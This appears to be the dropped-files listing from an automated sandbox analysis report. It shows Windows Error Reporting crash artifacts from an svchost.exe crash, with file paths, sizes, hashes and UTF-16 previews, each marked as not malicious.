                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.2.4.3.0.2.1.4.3.2.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.2.4.3.1.2.6.1.1.9.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.b.7.e.c.e.0.-.a.6.f.4.-.4.1.1.3.-.8.7.1.b.-.e.e.d.a.8.4.7.2.d.5.7.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.6.1.4.0.f.d.-.8.0.a.2.-.4.e.3.e.-.a.2.7.c.-.d.2.7.2.f.9.0.a.5.3.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.l.u.d.e.r.o.p.o.l.i.k.o.d.i.q.u.x.e.k.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.e.4.-.0.0.0.1.-.0.0.1.3.-.2.9.5.1.-.9.b.b.a.b.0.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.6.8.5.1.0.d.1.8.e.1.1.9.e.4.b.3.8.3.7.0.8.2.a.6.d.2.c.e.e.5.0.0.0.0.0.0.0.0.!.0.0.0.0.a.c.f.5.8.b.4.e.b.3.f.0.f.f.d.a.9.a.2.c.d.9.1.d.e.f.5.8.3.4.2.2.a.1.1.e.d.8.7.3.!.s.v.c.h.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_8759a9a7a5b67d21607ecf0de7fb110cabea5_7a704da5_2186ad98-d59d-482b-85ae-e0d7f33b51cf\Report.wer

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                  Entropy (8bit):1.2514971566655746
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:fVQZs0i0VeWpRaOTYq+Z9fQZzuiFvZ24lO8I8E:tssSVBpRaKY1LczuiFvY4lO8rE
                                                                                                                                                                                                                                                  MD5:5E512E8BD0A88D1B28DF65ACB2690FA8
                                                                                                                                                                                                                                                  SHA1:5868AD784DEEE6F56391E3F2BA4F268F7AF402D8
                                                                                                                                                                                                                                                  SHA-256:2D94E824FC4FDEE15671B3EA032BB3A07721FE1A3F7096BC7E904BD4A9C0958E
                                                                                                                                                                                                                                                  SHA-512:A339BDF582D5758B46966F0309D31F9748A67315D5DA6CA441A238454C79A17DD8BFA49470FB83614E041594C2A19788B97DEE286C1C7E5FEEF292DFE0B380DB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.2.4.3.2.3.3.7.0.0.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.2.4.3.3.6.1.8.2.5.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.1.8.6.a.d.9.8.-.d.5.9.d.-.4.8.2.b.-.8.5.a.e.-.e.0.d.7.f.3.3.b.5.1.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.0.e.2.c.e.6.-.c.0.1.0.-.4.4.9.a.-.8.3.8.d.-.4.8.8.1.d.e.b.b.5.a.4.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.l.u.d.e.r.o.p.o.l.i.k.o.d.i.q.u.x.e.k.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.8.-.0.0.0.1.-.0.0.1.3.-.5.0.c.c.-.e.6.b.9.b.0.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.6.8.5.1.0.d.1.8.e.1.1.9.e.4.b.3.8.3.7.0.8.2.a.6.d.2.c.e.e.5.0.0.0.0.0.0.0.0.!.0.0.0.0.a.c.f.5.8.b.4.e.b.3.f.0.f.f.d.a.9.a.2.c.d.9.1.d.e.f.5.8.3.4.2.2.a.1.1.e.d.8.7.3.!.s.v.c.h.o.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C4C.tmp.dmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 16 streams, Fri Apr 26 08:07:10 2024, 0x1205a4 type
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):516906
                                                                                                                                                                                                                                                  Entropy (8bit):3.3026005110651724
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:MhwnsvFWB+ymswq+sfbM4FhdxS5PYjvamgXc1MFD/BtIcS7F7Xj21CCqLeLVF3+C:MhDIgAgsf442UJ8qLeLVF3Q/S/E
                                                                                                                                                                                                                                                  MD5:32CC107C2CCCE5462C5C19A512A65C33
                                                                                                                                                                                                                                                  SHA1:CA6DE203C6759BDC6D5F3C54AB29137D93BA137B
                                                                                                                                                                                                                                                  SHA-256:F2ACE67D591B4D9B6A51D841F18D05FA0CF4809A3994E18A7DBA429CC43EE5F2
                                                                                                                                                                                                                                                  SHA-512:508B7A793B67CE8278F90ED86DEDD52C2F210E2B4A2A08495EC59D6E12C0C08D6C5FE808D86BB9226FA3DE9B77FF00066E86C8DFD3B90016F1CA5405440C2DD8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:MDMP..a..... ........`+f........................<...........$....)....... ..$).......T..............l.......8...........T...........X?..............I...........K..............................................................................eJ......8L......Lw......................T............`+f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EBE.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):6562
                                                                                                                                                                                                                                                  Entropy (8bit):3.7298508166611217
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ8m25YHML03pr089bnojafqdem:R6lXJVwYsLCnoef0H
                                                                                                                                                                                                                                                  MD5:CEECD59DB74EC0A593A70055816482D2
                                                                                                                                                                                                                                                  SHA1:393EC10947135A28361028D36C887D427B5213B8
                                                                                                                                                                                                                                                  SHA-256:0423EEBC7C90E3A7D6B9915935F5115538CD2D9D53782B5C34D4A3F6D6C47DF8
                                                                                                                                                                                                                                                  SHA-512:6FF57DD20C89B8FC0601D017EB2A7A0D07B5E403A00C2828BF934809BC867D4E20C62B72E230F0EDB77FE4439987F9E3FA5316CB4BF274F2173709BEE3B33318
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.6.4.<./.P.i.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EEE.tmp.xml

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4756
                                                                                                                                                                                                                                                  Entropy (8bit):4.498462031107477
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zstJg771I9gLWpW8VYwYm8M4JCfRFYyq85bwPhswd:uIjfHI7f67V0JCcRPhswd
                                                                                                                                                                                                                                                  MD5:2AE23111F5B485F4715C2E4451D0330C
                                                                                                                                                                                                                                                  SHA1:5764C76578D0DFD8BB77CDC7C8A2350FA539F33C
                                                                                                                                                                                                                                                  SHA-256:83C59215275E9CE7B4307A965D36AF1D8DFAED8D00018BD6CC7F0BB835BB2586
                                                                                                                                                                                                                                                  SHA-512:BA55CDB0D019A6E00098A5FB6C0A15650E2DFBC04C3D592470F1A8ED63162B192B5219BE4F9AB278EB20D77BAA053EAA92A674E7703C18706739DC30446311DD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EFB.tmp.csv

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):89970
                                                                                                                                                                                                                                                  Entropy (8bit):3.0863595795637053
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:zahcB6i2fQqHKhcSeGYiGN/vijCmw4b692BXWAJQpEnvt:zahcB6i2fQqHKhcSeGYiGN/vijCmw4bP
                                                                                                                                                                                                                                                  MD5:443BDAD2B3C57B4E2E1B9DC7AD755FED
                                                                                                                                                                                                                                                  SHA1:3F7B70EAECFA7F50F5A48D68F4F7CF84E127DA7B
                                                                                                                                                                                                                                                  SHA-256:73648263E36BC3E361FA707582537AE1214A2288F6C40E82DC85082B5E671F58
                                                                                                                                                                                                                                                  SHA-512:A61CC28B8E36D8ADE31990FE03554D436015EA21F7EE7D9C64FF7B4810C3F3F9DBFA97C7F1CDD3CAFEF9F0469CC3FF13B126580DD130DBF6CF51AA389E1262F0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FF6.tmp.txt

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13340
                                                                                                                                                                                                                                                  Entropy (8bit):2.6854254464670997
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:TiZYWNgZpmk93VYhYBWPYHPtUYEZ+ct+iNk2XF+wrULs0ahFkMX0oIIbnl3:2ZDeVmiwU5ahFkMX0ovbnl3
                                                                                                                                                                                                                                                  MD5:4DCFACB88831D317D15C9E639D874330
                                                                                                                                                                                                                                                  SHA1:BB0B7DB08EE80F08A28C1C92D17792E4F8AF9347
                                                                                                                                                                                                                                                  SHA-256:E8610DB722B19F8F85E025471FBFDBFD6D438C0199391E6728E864DCC5BA81BF
                                                                                                                                                                                                                                                  SHA-512:426A84E846E7D08E164F7C782351FF9BCFD6F671BD4EA12B2BBA9D11B632AA43BF6D0322B839C93417C18A1E4635B92B085D7A058DAD87F8B9C1FBCB40712DF6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2499.tmp.dmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 16 streams, Fri Apr 26 08:07:12 2024, 0x1205a4 type
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):509917
                                                                                                                                                                                                                                                  Entropy (8bit):3.2910501804768866
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:QgUWgmtVLP2uDOf+5R7XtpGq3ee9XVL3QiA/:QgP3Oaf5kq3eOQ
                                                                                                                                                                                                                                                  MD5:A4E8A93A2842B0BDC1EB8C52B1E896D2
                                                                                                                                                                                                                                                  SHA1:FB441967A4939ADAC8C72AC7C43338EFA85AD837
                                                                                                                                                                                                                                                  SHA-256:AE593652EF89B2AFEC1FCB0AC0431CDB52825445C6495C9E2150751A6B2E1FAA
                                                                                                                                                                                                                                                  SHA-512:4CFB597809A1E21F4588AA81867E8CD7F1F5F59847B9BBBE3337982EE9907B5B2E8E9A6A16F4B321879DA91357166852C5C517DF9D751F1D9D36E715CD95D44E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:MDMP..a..... ........`+f......................... ..........$....)....... ...)......$T..............l.......8...........T............?..5............J..........xL..............................................................................eJ.......M......Lw......................T............`+f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2814.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):8602
                                                                                                                                                                                                                                                  Entropy (8bit):3.701194227713756
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJCNhy6YEbflgmfZtT0yprj89bnjDUfWd7m:R6lXJQE6YETlgmfPKnjwfwy
                                                                                                                                                                                                                                                  MD5:C16F6834257C3D556F26A4F16F8AA487
                                                                                                                                                                                                                                                  SHA1:5E5440DE4444AA9F283222CFC705473A8B25CF62
                                                                                                                                                                                                                                                  SHA-256:6E48F98A94B29039FDF0B95D63C85E6D8F910CF405EB4B03AC6132C2BFABAB03
                                                                                                                                                                                                                                                  SHA-512:560FA9BE44D19A5C9E93A834E152BE1FAFDFA043382539439EAEA09D0EED1A076570C567F171EBFA24D0F82D5BFC0F1EA3192F10C926C9338A8BE671C661639E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.2.<./.P.i.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2892.tmp.xml

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4811
                                                                                                                                                                                                                                                  Entropy (8bit):4.492183509623581
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zstJg771I9gLWpW8VYGYm8M4JCfE6Fdehyq8veErTPhuwd:uIjfHI7f67VWJC8UehWPrTPhuwd
                                                                                                                                                                                                                                                  MD5:169EBE4780260521484B9BD0A000315B
                                                                                                                                                                                                                                                  SHA1:932C700152097F0AE8B06981A39C859E21F0A294
                                                                                                                                                                                                                                                  SHA-256:A3D298D432224F513BF9D8A1DEA316FEAF11F4510A598F537B5C9C45E0BEC78F
                                                                                                                                                                                                                                                  SHA-512:B23E39C2429F9B45C5E3E816E635EDBC7E5D772A719C9286A13AFC6B562C4F07D826DD09DD165B2648FBB352159FCF787B0CC4E35C6F6BF9A4F997565754767D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER28D1.tmp.csv

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):89176
                                                                                                                                                                                                                                                  Entropy (8bit):3.0876080749875725
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:1D+S3WzrvqxZMiacJeGvvGWdvHnrXR4b692BXWAJQpEn3rj:1D+S3WzrvqxZMiacJeGvvGWdvHnrXR45
                                                                                                                                                                                                                                                  MD5:FA39B3D37C830F2A40AD29C02083F9D5
                                                                                                                                                                                                                                                  SHA1:CAFC78768FE9BF54994CB63E44BD3D575EE91C36
                                                                                                                                                                                                                                                  SHA-256:7D4E0301AE8572B0395E44E83D3E473D8B7371E7A3AE10172ED323A31C54F81B
                                                                                                                                                                                                                                                  SHA-512:F671784A37AAB6A07994CBAA205960B47068FD0B454A5841C687FFD6CFDFBEBFB6ACFED9896BDE6AB788EE89D57E24A29B04881910B6511B946FEA7BA2E544E6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER294F.tmp.txt

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13340
                                                                                                                                                                                                                                                  Entropy (8bit):2.68570186508441
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:TiZYW0bQJWoWlY7YVWPZzSH8UYEZ7ut+i8kFXBGCwP8l8QaNZFtMxLo4IMnl3:2ZD0bzlcNs4TajFtMxLofMnl3
